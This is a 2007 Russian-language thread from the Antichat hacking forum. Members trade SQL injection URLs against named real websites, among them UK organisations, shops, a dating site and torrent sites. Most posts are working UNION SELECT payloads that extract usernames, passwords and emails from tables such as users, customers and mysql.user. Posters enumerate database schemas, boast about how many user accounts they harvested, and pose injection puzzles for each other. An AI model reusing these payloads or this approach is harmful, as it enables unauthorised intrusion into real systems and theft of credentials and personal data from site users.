Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

16.02.2007, 01:24
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме: 631013
Репутация:
453
|
|
http://www.starkeith.net/member.php?user_id=-4%20union%20select%201,2,3,4,5,6,7,8/*
http://bartertown.com/ref/index.php?user_id=5 UNION SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13/*
http://www.cgam.nerc.ac.uk/people/people_research.php?user_ID=-5%20UNION%20SELECT%200,1,2,3,4,password,6,7,8,9,10 ,11,12,13,14,15,16,17%20from%20mysql.user/*
Воть 
|
|
|

16.02.2007, 01:59
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме: 3536885
Репутация:
447
|
|
Сообщение от Thanat0z
Если не катит через юнионселект, пробую через ордербай
ИМХО сначала использовать order by так как сокращаешь время подбора но не везде работает.
http://bestposters.ru/main.php?big=-1262+union+select+1,concat(login,char(58),password ,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15+f rom+users+limit+1,1/*
около 20 юзеров, фу бяка даже не интересно 
Последний раз редактировалось }{0TT@БЬ)Ч; 16.02.2007 в 04:11..
|
|
|

16.02.2007, 05:36
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме: 5352530
Репутация:
2062
|
|
для меня день сегодня не очень удачный в количестве скулей, но очень поучительный в плане ошибок. Сейчас приведу скули, где есть ошибки, с которыми я ранее не сталкивался, и которые так или иначе являются тупиком, или по крайней мере я ничего получить не смог
Код:
__http://www.revolution.co.uk/_forum.php?neuron=3+order+by+14/*
__http://www.laptopshowcase.co.uk/downloads.php?id=1+group+by+11/*
__http://www.immunisation.org.uk/article.php?id=-97'+union+select+1,2,3,4,5,6,7,8/*
а кто разгадает это головоломку, тому дам +6
Код:
__http://www.prospect-magazine.co.uk/article_details.php?id=7320')+union+select+1111,2222,3333,4444,555,666/*
и только один удачный
Код:
__http://www.publicwhip.org.uk/policy.php?id=-230+union+select+1,user,3,4,5,6,7/*
таблицу не смог подобрать, так пробывал...
__http://www.publicwhip.org.uk/policy.php?id=-230+union+select+1,user_name,3,4,5,6,7+from+pw_dyn.user/*
|
|
|

16.02.2007, 06:05
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме: 8854279
Репутация:
2727
|
|
Thanat0z, читай больше
Код:
http://www.revolution.co.uk/_forum.php?topic=3766&message=446388+union+select+1,2,3,4,convert(version()+using+latin1),6,7,8,9&neuron=3&page=0
http://www.immunisation.org.uk/article.php?id=997'+union+select+1,2,user(),version(),5,6,7,8,9/*
http://www.prospect-magazine.co.uk/list.php?subject=48+union+select+1,2,3,version(),5,6,7,8,9,0,user(),2,3/*
__________________
ПИУ-ПИУ...
|
|
|

16.02.2007, 06:10
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме: 5352530
Репутация:
2062
|
|
Сообщение от c411k
Thanat0z, читай больше
Код:
http://www.revolution.co.uk/_forum.php?topic=3766&message=446388+union+select+1,2,3,4,convert(version()+using+latin1),6,7,8,9&neuron=3&page=0
http://www.immunisation.org.uk/article.php?id=997'+union+select+1,2,user(),version(),5,6,7,8,9/*
http://www.prospect-magazine.co.uk/list.php?subject=48+union+select+1,2,3,version(),5,6,7,8,9,0,user(),2,3/*
хе  в этих кто может и можно вытянуть, а привел я совсем другие  Но все равно ты крут 
|
|
|

16.02.2007, 09:47
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме: 2693408
Репутация:
861
|
|
Thanat0z,c411k,
Код:
http://www.prospect-magazine.co.uk/list.php?subject=48+union+select+1,2,3,concat(email,0x3a,password),5,6,7,8,9,0,1,2,3+from+customers/*
email=login

|
|
|

16.02.2007, 18:04
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме: 2848854
Репутация:
409
|
|
_http://www.bushtorrent.com/pic.php?id=-99+union+select+1,0x6869206d616e20212121,3,4,5,6+f rom+mysql.user/*
хех название таблиц не подобрал, зато название хоста))...тут приручена булка..а у булки название таблицы юзеров какая?
датинг сайт 300 юзеров
_http://www.datenlove.com/pic.php?id=-99+union+select+concat(name,0x3a,password,0x3a,ema il),2+from+users+limit+300,1/*
_http://www.112uh.com/image.php?id=-99+union+select+1,2,concat(username,0x3a,password, 0x3a,email),4+from+eftersnack_users/*
_http://www.112uh.com/image.php?id=-99+union+select+1,2,concat(user,0x3a,pass),4+from+ bf_users/*
но вход в админку только с определённого ип
Последний раз редактировалось злюка; 16.02.2007 в 19:33..
|
|
|

17.02.2007, 00:40
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме: 3536885
Репутация:
447
|
|
Сообщение от злюка
_http://www.bushtorrent.com/pic.php?id=-99+union+select+1,0x6869206d616e20212121,3,4,5,6+f rom+mysql.user/*
хех название таблиц не подобрал, зато название хоста))...тут приручена булка..а у булки название таблицы юзеров какая?
злюка перебирай
http://www.bushtorrent.com/pic.php?id=-99+union+select+1,concat(username,char(58),passwd) ,3,4,5,6+from+users+limit+1,1/*
мои любимые часики http://www.orient-time.ru/trade/news.php?nid=-25+union+select+1,2,database(),user(),version()/* 
Последний раз редактировалось }{0TT@БЬ)Ч; 17.02.2007 в 00:51..
|
|
|

17.02.2007, 03:05
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме: 4908597
Репутация:
1866
|
|
Код:
http://www.nix.ru/news/pnv.html?id=-99+union+select+table_name,2,3,4,5+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
=\
|
|
|

17.02.2007, 03:12
|
|
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме: 483324
Репутация:
92
|
|
http://www.nintek.com.au/x/Scripts/nin_support_faq.asp?cate=-1+UNION+ALL+SELECT+1,table_name+from+information_s chema.tables--
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|